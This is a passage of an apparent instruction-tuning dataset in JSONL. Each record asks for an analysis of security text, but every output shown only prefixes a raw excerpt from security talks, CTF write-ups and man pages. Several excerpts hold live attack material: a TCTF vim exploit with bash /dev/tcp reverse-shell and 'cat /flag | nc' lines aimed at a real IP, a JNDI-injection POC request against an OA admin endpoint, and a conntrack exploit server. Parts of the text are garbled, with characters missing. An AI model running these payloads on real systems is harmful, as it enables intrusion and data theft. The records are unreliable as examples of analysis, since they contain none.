这个bean中所配置的登录流程属性引用值就是我们webflow上下文配置中的 loginFlowRegistry 这个属性 因此我们来看一下 loginHandlerAdapter 这个bean对应的类为 org.jasig.cas.web.flow.SelectiveFlowHandlerAdapter 所起的作用是如何来处理登录动作的 先来看一下这个类的父类 org.springframework.webflow.mvc.servlet.FlowHandlerAdapter 这 个是Springmvc中的一个类 FlowHandlerAdapter 实现接口 HandlerAdapter 而 SelectiveFlowHandlerAdapter 继承自 FlowHandlerAdapter  SelectiveFlowHandlerAdapter 类在 cas-server-webapp-actions 模块下的 org.jasig.cas.web.flow 包下 因此Spring的DispatcherServlet找到要处理的 handleAdapter 是 SelectiveFlowHandlerAdapte 并 且根据地址http://localhost:8080/cas/login?service=XXX得到handler的flowId=\"login\"即流程 loginFlowRegistry  然后进入下面的handle方法开始调取流程 当有登录请求时spring则会调用该 org.jasig.cas.web.flow.SelectiveFlowHandlerAdapter 跟进 this.flowUrlHandler.getFlowExecutionKey(request) 可见该方法会获取请求中的 execution 参数 而后会进行调用 this.executionRepository.parseFlowExecutionKey(flowExecutionKey); 获取到 key 跟进查看 可见从 execution 参数后分割UUID和 _ 后面部分而后面部分进行base64解密对返回id和data进 行赋值然后返回 ClientFlowExecutionKey 对象 下面调用 this.executionRepository.getFlowExecution(key); 将刚刚获取到的 ClientFlowExecutionKey 对象即key变量传递跟进 这地方进行了数据的反序列化操作先来看到构造方法使用 AES/CBC/PKCS7 加密方式并且密钥使用 默认的密钥进行加密 而在解密后还会对数据进行解压缩 GZIPInputStream 处理后进行反序列化 漏洞复现与利用 根据以上数据解析分析我们", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### CVP概述 CVP是Lattice-based cryptography中尤为重要的一个问题 问题的基本定义如下给定格$L$的一组基与向量$\\mathbf{v}$找到在$L$上离$\\mathbf{v}$最近的一个向量 <!-- TODO: Add more Lattice-based cryptography (CVP specifically) application intro here. TODO: Make intro more descriptive and rigorous. --> ### Babai's nearest plane algorithm介绍 <!-- TODO: Add intro --> 该算法输入一组格$L$(秩为$n$)的基$B$和一个目标向量$\\mathbf{t}$输出CVP问题的近似解 * 近似因子为$\\gamma = 2{\\frac{n}{2}}$ * 其中$c_j$为Gram-schmidt正交化中的系数取整也即$proj_{b_{j}}(b)$的取整 对于该算法第二步的个人理解在格基规约和正交化过后的基$B$中找到一个最靠近$\\mathbf{t}$的线性组合 ### Babais Rounding Technique介绍 该算法是`Babai's nearest plane algorithm`的一个变种 步骤可以表示为 ``` N = rank(B), w = target - B' = LLL(B) - Find a linear combination [l_0, ... l_N] such that w = sum(l_i * b'_i). * (b'_i is the i-th vector in the LLL-reduced basis B') - Round each l_i to it's closest integer l'_i. - Result v = sum(l'_i * b'_i) ``` ### Hidden number problem介绍 HNP的定义如下 给定质数$p$许多$t \\in \\mathbb{F}_p$以及每一个对应的$MSB_{l,p}(\\alpha t)$找出对应的$\\alpha$ * $MSB_{l,p}(x)$表示任一满足 $\\lvert (x \\mod p) - u \\rvert \\le \\frac{p}{2{l+1}}$ 的整数 $u$近似为取$x \\mod p$的$l$个最高有效位 根据参考3中的描述当$l \\approx \\log{\\frac{1}{2}}{p}$时有如下算法可以解决HNP 我们可以将此问题转化为一个由该矩阵生成的格上的CVP问题 $\\left[ \\begin{matrix} p & 0 & \\dots & 0 & 0 \\\\ 0 & p & \\ddots & \\vdots & \\vdots \\\\ \\vdots & \\ddots & \\ddots & 0 & \\vdots \\\\ 0 & 0 & \\dots & p & 0 \\\\ t_1 & t_2 & \\dots & t_{n} & \\frac{1}{2{l+1}} \\end{matrix} \\right]$ 我们需要找到在格上离$\\mathbf{u}=(u_1, u_2, \\dots, u_{n}, 0)$最近的向量所以在这里我们可以采用`Babai's nearest plane algorithm`最终我们可以得到一组向量 $\\mathbf{v}=(\\alpha \\cdot t_1 \\mod p, \\alpha \\cdot t_2 \\mod p, \\dots, \\frac{\\alpha}{2{l+1}})$从而算出 $\\alpha$", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDSCTF WriteUp By Nu1L DSCTF WriteUp By Nu1L Crypto picproblem approximate RAS-330 Pwn fuzzerinstrospector Re catchme FFunction Misc Muti Operations Web pingpingping easy_tou Crypto picproblem from math import sqrt from numpy import array, zeros, uint8 import cv2 image = cv2.imread('encflag.jpg') imagearray = array(image) height, width, _ = imagearray.shape P = 152499380767419384190482151255394637996737469827829605515820669958508347281748972149386 271161591540732631566067054180175361690003977280272892522609147586068968287155564124150 018389239751303797118670912362907758420422608452481167379498468784017877205254544124292 749290258354735556552553866483651658972194298057709542156188687392863433064097980004057 406021887278721242663020250811848426955398339917915548958331640010765556422245343746272 474909726512230064493671743415133163309258514018351034936942252744026474684397283492786 006557855783615079869053017269467951423172261382224681001013000532403249236088953155380 383239860456308825641048186524377121699060316699319893535847183132839561847797412682476 256087233759499739421823442705039965527084838599508858642052688639732094935098040693620 021711204097143366032217907228843884296495756871903679432020311626332962358933936749730 314093807033455734583422608518914085826438806374518983358496282550984327967882624055848 0527560 Q = 144974785760548835346080059675412116045004097684551930165850975100610036892637453087023 174291792239067432699807208947124014006634368316951997771667232583833232880189156177352 470797718066692597287113650243525462092611802610357250167553054026631032284308722771634 556793732059662255302266706271253907460229391573739859730440609795755839632518038087485 681488398060156530605953365870145579216484383748607826241099837323269013706670885203243 320911762799081847175287904146825978855342576982002242510264451197524255607780638723630 376832471330616731367331247218403195050108364738578247240257973651044843267327677509991 40514638349792795122862652761359414695123", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n蓝某OA后台JNDI命令执 前段时间发了套组合利到xmldecoder反序列化的但是后拿到源码看了下 前台和后台的管理员账户不是个密码可能只是运好前后台了同个密 码 之前就有说过后台有JNDI且提供测试链接需保存操作 OA使的是带的jdk1.7. 可以直接使上的Payload进jndi注 EXP具:https://github.com/welk1n/JNDI-Injection-Exploit 使1.7地址 然后直接点击测试链接就可以: POC POST /admin.do HTTP/1.1 Host: adderss Connection: close Connection: close Content-Length: 61 sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: LtpaToken=; JSESSIONID=9A9692B5AC5ABEB779C4F77244E73362 method=testDbConn&datasource=rmi://ip:port/sxoevq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSamsung Pay: Tokenized Numbers, Flaws and Issues Salvador Mendoza July 7, 2016 Introduction Samsung Pay is a new method to make purchases over the latest line of Samsung smartphones devices. The goal is to implement mst technology mainly in every purchase. However, Samsung Pay could use nfc technology as well. Samsung implements a new sophisticated alphanumeric algorithm called tokenization. Partner with card providers like Visa, Mastercard and others, Samsung embraced the VTS framework(Visa Token Service) to push its ambitious project. If you are a Samsung Pay user, you do not even think about the new markets goals that this company is planning. Such as online purchases or customizable memberships. Samsung made a step forward in the electronic market. As result, its purchase process is very interesting. So every time when people add a card at their Samsung Pay, the system generates a new virtual random CC implementing the framework which assigns a token to each card. This process is based in another package: Spayfw. That token is saved in a Token Vault somewhere relating the original PAN information. So in each transaction instead of using the original CCs data, the system sends a tokenized number: a new card number with some parameters in the tracks. The main idea behind this is that if someone is able to get a token, he/she will not be able to reuse or extract the original CCs information. Analyzing Spay Before I started digging into the apk, I needed to take a look at the Spays databases to have a better understanding of its complexity. I started playing with the terminal and adb command, first I backed up the data of Samsung Pay: adb backup com.samsung.android.spay f sbackup.ab  Decompress it using openssl with zlib support or dd with python. dd if=sbackup.ab bs=24 skip=1 | openssl zlib d > sbackup.tar  [Or Python with zlib support.] dd if=sbackup.ab bs=1 skip=24 | python c \"import zlib,syssys.stdout.write(zlib.decompress(sys.stdin.read()))\" | tar xvf   If we o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1\" MODERN MALWARE: OBFUSCATION AND EMULATION DEF\"CON\"CHINA\"1.0\"(2019)\" DEF CON CHINA 1.0 (2019) by Alexandre Borges ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" DEF\"CON\"CHINA\"1.0\"(2019)\" 2\" ü Malware and Security Researcher. \" ü Speaker at DEFCON USA 2018 ü Speaker at HITB 2019 Amsterdam ü Speaker at CONFidence Conf. 2019 ü Speaker at BSIDES 2018/2017/2016 ü Speaker at H2HC 2016/2015 ü Speaker at BHACK 2018 ü Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics and Rookits. \" ü Reviewer member of the The Journal of Digital Forensics, Security and Law.\" ü Referee on Digital Agenda: \" v Introduction v Anti-reversing v METASM v MIASM v TRITON v Radare2 + MIASM v DTRACE on Windows v Anti-VM v Conclusion ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" \"INTRODUCTION DEF\"CON\"CHINA\"1.0\"(2019)\" 3\" ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" DEF\"CON\"CHINA\"1.0\"(2019)\" 4\" ü Every single day we handle malware samples that use several known packers such as ASPack, Armadillo, Petite, FSG, UPX, MPRESS, NSPack, PECompact, WinUnpack and so on. For most of them, it is easy to write scripts to unpack them. ü We also know the main API functions, which are used to create and allocate memory such as: ü VirtualAlloc/Ex( ) ü HeapCreate( ) / RtlCreateHeap( ) ü HeapReAlloc( ) ü GlobalAlloc( ) ü RtlAllocateHeap( ) ü Additionally, we know how to unpack them using debuggers, breakpoints and dumping unpacked content from memory. Furthermore, pe-sieve from Hasherezade is excellent. J ü When we realize that the malware use some customized packing techniques, it is still possible to dump it from memory, fix the ImageAddress field using few lines in Python and its respective IAT using impscan plugin to analyze it in IDA Pro: ü export VOLATILITY_PROFILE=Win7SP1x86 ü python vol.py -f memory.vmem procdump -p 2096 -D . --memory (to keep slack space) ü python vol.py -f memory.vmem impscan --output=idc ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents DirectX: The New Hyper-V Attack Surface Zhenhao Hong (@rthhh17) Ziming Zhang (@ezrak1e) #BHUSA @BlackHatEvents Information Classification: General whoami Zhenhao Hong (@rthhh17)  Security Specialist of Ant Group Light-Year Security Lab  2019-2020 MSRC Most Valuable Security Researchers  Black Hat USA 2021 Speaker Ziming Zhang (@ezrak1e)  Security researcher of Ant Group Light-Year Security Lab  2021 Tianfu Cup Windows project winner  2021 Q2/Q4 Microsoft Most Valuable Security Researchers #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Intro  In 2020, Hyper-V introduced a new feature of GPU- Paravirtualization.  This technology is integrated into WDDM (Windows Display Driver Model) and all WDDMv2.5 or later drivers have native support for GPU virtualization.  New features mean new attack surfaces. #BHUSA @BlackHatEvents Information Classification: General WDDM Architecture https://docs.microsoft.com/en-us/windows-hardware/drivers/display/images/dx10arch.png #BHUSA @BlackHatEvents Information Classification: General Hyper-V DirectX Component Architecture Hypervisor (Ring -1) User Mode Kernel Mode Linux VM Windows Host VMBUS (hv_vmbus.ko) DirectX LKM (dxgkrnl.ko) Application /dev/dxg vmcall Application Runtime Component UserMode Driver VMBUS Component DirectX graphics kernel subsystem (dxgkrnl.sys) DirectX graphics MMS (dxgmms1.sys & dxgmms2.sys) GPU driver vmcall #BHUSA @BlackHatEvents Information Classification: General WDDM Data Flow Hypervisor (Ring -1) User Mode Kernel Mode Linux VM Windows Host VMBU", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbypass NAT tcp #!/usr/bin/env python # -*- coding: utf-8 -*- # # Fake ftp server code for conntrack exploit # # This software is in the public domain, furnished \"as is\", without technical # support, and with no warranty, express or implied, as to its usefulness for # any purpose. # # Author: Roman Tsisyk # # Please read README file first! # This server gets PORT request from client, checks if ip address matched # a real cleint adddress and tries to connect. It emulates ftp sometimes, but # its not realy necessary for our needs, just for a smart firewalls and logs # import sys, logging,os from SocketServer import ThreadingTCPServer, ThreadingMixIn, BaseRequestHandler # # Main server class # class BackConnectServer(ThreadingMixIn, ThreadingTCPServer): # logger log = None; # # Main handler # class BackConnectHandler(BaseRequestHandler): def __init__(self, request, client_address, server): self.log = server.log; self.test302 = 0; BaseRequestHandler.__init__(self, request, client_address, server); def setup(self): self.log.info('%s:%s connected', *self.client_address); #self.request.send('220 vsFTPd ready.\\n'); def check(self, ip, port): self.log.info('%s: probing %s:%s', self.client_address, ip, port); # # connect to this port using external program and do smth # os.system('nmap -sT %s -p %s'%(ip, port)); #return True; if connection established return False; def handle(self): data = True; while data: data = self.request.recv(1024); print data; cmd = data[0:4]; self.log.debug('%s: %s', self.client_address, data.strip()); # we really not have to handle all ftp protocol and check states like fsm # let client think that auth realy needed and there is real ftp if cmd == 'PORT': port_data = data[4:].strip().split(','); try: # extract port number port = int(port_data[4]) << 8 | int(port_data[5]); except: self.log.error('%s: Invalid reply received', self.client_address); # check if there is not NAT or # nf_nat_ftp converted internal fake ip to external #if ('.'.join(port_data[0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTCTF 2019 TCTF 2019 PWN vim zerotask plang Reverse Elements Fixed Point sanitize Web Ghost Pepper Wallbreaker Easy Crypto babyrsa MISC flropyd Neuron Break http://ctf.0ops.sjtu.cn/ 23 March 2019, 06:00 UTC  25 March 2019, 06:00 UTC Nu1L PWN vim a stepperm_state_Tbuffer freegotbufferfreegot system from pwn import * from hashlib import sha256 import string import sys system = 0x004C9163 free_got = 0x8a8238 # cmd = \"bash -c 'bash&>/dev/tcp/111.230.94.113/6666<&1';\" # # cmd = 'cat /flag | nc 111.230.94.113 88;'.ljust(0x4f) + p64(system) # cmd = \"echo 1 | nc 111.230.94.113 88\\x00\".ljust(0x2f) + p64(system) # cmd += p64(0x4036b0) + p64(0x4036c0) + p64(0x4036d0) + p64(0x4036e0) + p64(0x4036f0) + \"\\x00\" # cmd = cmd.ljust(0x82-0x20) # cmd = cmd[::-1] # context.endian = 'big' # ss = 'VimCrypt~04!\\xff\\xff\\xff\\x9e0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM NOP' # ss = ss.replace('lmnopqrs',p64(free_got-0x30)) # ss = ss.replace('tu','\\x73u') # for i in cmd: # ss += i # for i in range(0x26,0x30): # ss += chr(i) # ss = ss.ljust(0x300) # for i in range(0,0x21): # ss += chr(i) # for i in cmd: # ss += i # for i in range(0x83,0xff): # ss += chr(i) # ss = ss.replace('\\xb6',' ') # ss += '.' # ss = ss.replace('d8d9dadbdcdddedf'.decode('hex'),p64(free_got-0x30)) # second cmd = \"bash -c 'bash&>/dev/tcp/111.230.94.113/66<&1';\" # cmd = ';cat /f* | nc 111.230.94.113 88\\x00' + p32(system)*2 # cmd = cmd.ljust(0x26+10,\"\\x00\")[::-1] free_got = 0x8a8238 system = 0x004C9163 context.endian = 'big' ss = 'VimCrypt~04!\\xff\\xff\\xff\\x9e0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM NOP' ss = ss.replace('lmnopqrs',p64(free_got-0x30)) ss = ss.replace('tu','\\x7cu') # for i in cmd: # ss += i for i in range(0+6,0x12): ss += chr(i) cmd = cmd.ljust(0x41-0x12,'A') print 'exec cmd,',cmd cmd = cmd[::-1] for i in cmd: ss += i ss = ss.ljust(0x8f,' ') print hex(len(ss)) ss = ss.replace('\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11',p64(system)) eee = ss open('test','wb').write(ss) # sys.exit(0) # 111.186.63.13:10001 sset = str", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一个简单的调用例子 注意: 不要启动多个ksubdomainksubdomain启动一个就可以发挥最大作用 可以看到调用很简单就是填写 options 参数然后调用runner启动就好了重要的是options填什 么 options的参数结构 package main import ( \"context\" \"github.com/boy-hack/ksubdomain/core/gologger\" \"github.com/boy-hack/ksubdomain/core/options\" \"github.com/boy-hack/ksubdomain/runner\" \"github.com/boy-hack/ksubdomain/runner/outputter\" \"github.com/boy-hack/ksubdomain/runner/outputter/output\" \"github.com/boy-hack/ksubdomain/runner/processbar\" \"strings\" ) func main() { process := processbar.ScreenProcess{} screenPrinter, _ := output.NewScreenOutput(false) domains := []string{\"www.hacking8.com\", \"x.hacking8.com\"} opt := &options.Options{ Rate: options.Band2Rate(\"1m\"), Domain: strings.NewReader(strings.Join(domains, \"\\n\")), DomainTotal: 2, Resolvers: options.GetResolvers(\"\"), Silent: false, TimeOut: 10, Retry: 3, Method: runner.VerifyType, DnsType: \"a\", Writer: []outputter.Output{ screenPrinter, }, ProcessBar: &process, EtherInfo: options.GetDeviceConfig(), } opt.Check() r, err := runner.New(opt) if err != nil { gologger.Fatalf(err.Error()) } ctx := context.Background() r.RunEnumeration(ctx) r.Close() } type Options struct { Rate int64 // 每秒发包速率 Domain io.Reader // 域名输入 1. ksubdomain底层接口只是一个dns验证器如果要通过一级域名枚举需要把全部的域名都放入 Domain 字段中可以看enum参数是怎么写的 cmd/ksubdomain/enum.go 2. Write参数是一个outputter.Output接口用途是如何处理DNS返回的接口ksubdomain已经内 置了三种接口在 runner/outputter/output 中主要作用是把数据存入内存数据写入文件数 据打印到屏幕可以自己实现这个接口实现自定义的操作 3. ProcessBar参数是一个processbar.ProcessBar接口主要用途是将程序内 成功个数  发送个数  队列数  接收数  失败数  耗时 传递给用户实现这个参数可以时时获取这些 4. EtherInfo是*device.EtherTable类型用来获取网卡的信息一般用函数 options.GetDeviceConfig() 即可自动获取网卡配置 DomainTotal int // 扫描域名总数 Resolvers []string // dns resolvers Silent bool // 安静模式 TimeOut int // 超时时间 单位(秒) Retry int // 最大重试次数 Method string // verify模式 enum模式 test模式 DnsType string // dns类型 a ns aaaa Writer []outputter.Output // 输出结构 ProcessBar processbar.ProcessBar EtherInfo *device.EtherTable // 网卡信息 }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"DROP AGGREGATE\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME DROP AGGREGATE \\- 删除一个用户定义的聚集函数 .SH SYNOPSIS .sp .nf DROP AGGREGATE \\fIname\\fR ( \\fItype\\fR ) [ CASCADE | RESTRICT ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBDROP AGGREGATE\\fR 将删除一个现存聚集函数 执行这条命令的用户必须是该聚集函数的所有者 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 现存的聚集函数名可以有模式修饰 .TP \\fB\\fItype\\fB\\fR 聚集函数的输入数据类型或者 * 如果这个聚集函数接受任意输入类型 .TP \\fBCASCADE\\fR 自动删除依赖于这个聚集的对象 .TP \\fBRESTRICT\\fR 如果有任何依赖对象则拒绝删除这个聚集这是缺省 .SH \"EXAMPLES 例子\" .PP 将类型 integer 的聚集函数 myavg 删除 .sp .nf DROP AGGREGATE myavg(integer); .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP 在 SQL 标准中没有 DROP AGGREGATE 语句 .SH \"SEE ALSO 参见\" ALTER AGGREGATE [\\fBalter_aggregate\\fR(7)], CREATE AGGREGATE [\\fBcreate_aggregate\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 16: How to evade geospatial intrusion detection techniques Ryan W. Trost Agenda  GIS  Geospatial Intrusion Detection implementations  Geospatial Intrusion Detection methodology  Accuracy of IP -> lat/long translation  Okayso how do I beat it?  Q&A 2 GIS  GIS (Geographic Information Systems): computer based methodology to collect, store, manipulate, retrieve, display and analyze georeferenced data.  GoogleEarth  ESRI  Intergraph  GRASS 3 GIS  Traditional GIS tools focused more on environmental issues  These days thanks to GoogleEarth and/or GoogleMaps the average Internet user is starting to be exposed to the power that mapping software unleashes.  Track a cell phone (cell tower triangulation)  Track flights in mid-air!!! 4 Cell Phone 5 Track Any Flight 6  Multiple security firms have implemented GIS tools in their products (in varying degrees)  MeerCat (Secure Decisions)  VisCat (ETRI)  GeoSWAT 7 Where has IT security and mapping collided? 8 MeerCat Image Courtesy: John Goodall Secure Decisions 07/06/08 9 VizCat 10 GeoSWAT Geospatial Intrusion Detection  Goal: find a direct correlation between externally based network alerts by plotting their source locations on a geographic map 11 How does it work?  High-level roadmap: 1. Plot rolling time period (1 week/2 weeks/4 weeks) 2. Eliminate friendlies to reduce IDS false positives 2.1 Geographically plot remote branches, SOHO, business partners locations by street address (very accurate in GoogleEarth) 2.2 Create an IDS alert that is triggered when a customer authenticates to a website 12 Geospatial Intrusion Detection 3. Run a clustering algorithm on plotted data  There are several different clustering algorithms to choose from:  Poisson, nearest-neighbor, Morans I Index, Ripleys K Function, Getis-Ord 4. Extract network alerts within identified hot- spot 5. Run a weight calculating algorithm to evaluate if there is a relationship between alerts  Correlating elements in an alert  Alert severity  Destination ports  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking SQL Injection for Remote Code Execution on a LAMP stack. Lance Buttars aka Nemus Updated Slides @ https://www.introtobackdoors.com Who am I? Just some guy who likes computer security. Twitter @Nemus801 I work as a PHP/Python application programmer. I am a member of the local Defcon Group www.dc801.org Freenode #dc801. I help organize and run 801 Labs which is a hackerspace located in downtown Salt Lake City. 801 Labs Hacker Space www.801labs.org Websecurity Warriors Podcast http://websecuritywarriors.com/ Prerequisites  Familiarity with Linux, Apache, MySQL, PHP (LAMP).  Linux Operating Systems CLI  SQL Databases and Basic SQL  http://www.w3schools.com/sql/sql_intro.asp  Apache Servers.  Basic PHP knowledge.  Understanding of HTTP POST and GET  http://www.w3schools.com/tags/ref_httpmethods.asp  LAMP Setup  https://www.digitalocean. com/community/tutorials/how-to-install-linux-apache- mysql-php-lamp-stack-on-ubuntu Why Study Attacks? The best defense is a good offense.  By understanding how SQLi attacks work one can understand what to look for when they believe a web server has been compromised or tampered with.  By studying attacks it becomes clear how to identify the weak points of a web application's overall architecture. What is SQL Injection? SQL injection is a code injection technique used to attack an application by sending input from a user defined source that is later interpreted and executed by the SQL database. SQL injection attacks work because the input taken from the user input is combined unfiltered or filtered poorly with a SQL statements that is passed to the database that allows the form user to manipulate the query. Scenario Through the point of view of an attacker this presentation will demonstrate the discovery of a SQLi vulnerability, the damaging effect it can cause, and how an attacker could gain Remote Code Execution (RCE). Steps 1. Identify the vulnerability. 2. Fingerprint server. 3. Enumerate data from the database. 4. Upload a bac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Date: Fri, 11 Sep 1998 19:13:45 +0100 .\\\" From: Edward Betts .\\\" Chinese Version Copyrighted Scorpino, www.linuxforum.net 2000 .\\\" Derived from the GNU diff info page. .\\\" May be distributed under the GPL. .TH DIFF 1 \"22sep1993\" \"GNU Tools\" \"GNU Tools\" .SH NAME diff \\- 找出两个文件的不同点 .SH 总览 .B diff [选项] 源文件 目标文件 .SH 描述 在最简单的情况是, .I diff 比较两个文件的内容 .I 源文件 和 .IR 目标文件 . 文件名可以是 .B \\- 由标准输入设备读入的文本. 作为特别的情况是, .B \"diff \\- \\-\" 比较一份标准输入的它自己的拷贝 如果 .I 源文件 是一个目录和 .I 目标文件 不是目录, .I diff 会比较在 .I 源文件目录 里的文件的中和 .IR 目标文件同名的文件, 反过来也一样. 非目录文件不能是 .BR \\- . 如果 .I 源文件 和 .I 目标文件 都是目录, .I diff 比较两个目录中相应的文件 依照字母次序排序这个比较是不会递归的除非给出 .B \\-r 或者 .B \\-\\-recursive. .I diff 不把一个目录的内容看为它是一个文件来比较被指定的文件不 能是标准的输入, 因为标准的输入是无名的并且有一样的名字的文 件的观点不适用 .B diff 的选项由 .BR \\- , 开始 所以正常地 .I 源文件名 和 .I 目标文件名 不可以用 .BR \\- 开头. 然而, .B \\-\\- 可以被它视为保留的即使作为文件名的开头 they begin with .BR \\- .  .SS 选项 下面是 GNU所接受的 .I diff 的所有选项的概要. 大多数的选项有两个相同的名字,一个是单个的 跟在 .BR \\- 后面字母, 另一个是由 .BR \\-\\- 引出的长名字. 多个单字母选项除非它们产生歧义能够组合为单行的命令行语法 .B \\-ac 是等同于 .BR \"\\-a \\-c\" . 长命名的选项能被缩短到他们的名字的任何唯一的前缀. 用 .RB ( [ 和 .BR ] ) 括起来显示选项产生歧义的选项 .TP .BI \\- 行数一个整数 显示上下文 .I 行数 (一个整数). 这个选项自身没有指定输出格式这是没有效果的除非和 .B \\-c 或者 .BR \\-u 组合使用. 这是已废置的选项对于正确的操作, 上下文至少要有两行 .TP .B \\-a 所有的文件都视为文本文件来逐行比较甚至他们似乎不是文本文件. .TP .B \\-b 忽略空格引起的变化. .TP .B \\-B 忽略插入删除空行引起的变化. .TP .B \\-\\-brief 仅报告文件是否相异,在乎差别的细节. .TP .B \\-c 使用上下文输出格式. .TP .BI \"\\-C \" 行数一个整数 .br .ns .TP .BI \\-\\-context[= lines ] 使用上下文输出格式显示以指定 .I 行数 (一个整数), 或者是三行当 .I 行数 没有给出时. 对于正确的操作, 上下文至少要有两行. .TP .BI \\-\\-changed\\-group\\-format= format 使用 .I format 输出一组包含两个文件的不同处的行其格式是 if\\-then\\-else . .TP .B \\-d 改变算法也许发现变化的一个更小的集合.这会使 .I diff 变慢 (有时更慢). .TP .BI \"\\-D \" name 合并 if\\-then\\-else 格式输出, 预处理宏由name参数提供条件. .TP .B \\-e .br .ns .TP .B \\-\\-ed 输出为一个有效的 .I ed 脚本. .TP .BI \\-\\-exclude= pattern 比较目录的时候忽略和目录中与 .IR pattern 样式 相配的. .TP .BI \\-\\-exclude\\-from= file 比较目录的时候忽略和目录中与任何包含在 .IR file 文件 的样式相配的文件和目录. .TP .B \\-\\-expand\\-tabs 在输出时扩展tab为空格保护输入文件的tab对齐方式 .TP .B \\-f 产生一个很象 .I ed 脚本的输出但是但是在他们在文件出现的顺序有改变 .TP .BI \"\\-F \" regexp 在上下文和统一格式中对于每一大块的不同显示出匹配 .IR rege", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n6/25/11 Balancing the Pwn Trade Deficit Series: APT Secrets in Asia {Anthony Lai,Benson Wu,Jeremy Chiu} Xecure Founder and Researcher PK, Security Researcher 6/25/11 There is no national secret here  We welcome spies and SS here. Spies/SS are human, too :) 6/25/11 Why we are here again  Last year, Val Smith, Colin Ames and I (Anthony) have worked together on analyzing China-made malware, making first east-meets-west research and studies. We conCnue this effort.  This year, we have dealt with many targeted aFack cases, we would like to share the case studies with you and the correlaCon analysis with my Taiwanese research fellows.  We are happy about this presentaCon is accepted in first- round selecCon of DEFCON 19, however, it is rejected in Blackhat with reviewer comment:  We are curious about your automated analysis. - Thank you for their comment ;-) 6/25/11 Who we are?  Anthony Lai (a.k.a Darkfloyd)  He works on code audit, penetraCon test, crime invesCgaCon and threat analysis and acted as security consultant in various MNCs. His interest falls on studying exploit, reverse engineering, analyse threat and join CTFs, it would be nice to keep going and boost this China-made security wind in malware analysis and advanced persistent threat areas.  He found security research group called VXRL in Hong Kong and has been working as visiCng lecturer in HK Polytechnic University on hacking course :)  Spoken at Blackhat USA 2010, DEFCON 18 and Hack In Taiwan 2010/2011 6/25/11  Benson Wu  He currently works as Postdoctoral Researcher from Research Center for Information Technology Innovation at Academia Sinica in Taiwan.  He focuses research on malware and threat analysis, code review, secure coding and SDLC process implementation. He graduated from National Taiwan University with PhD degree in Electrical Engineering. He had spoken at NIST SATE 2009, DEFCON 18 (with Birdman), OWASP China 2010, and wrote the \"Web Application Security Guideline\" for the Taiwan government. 6/25/11 ", "category": "text_analysis", "source": "security_papers"}
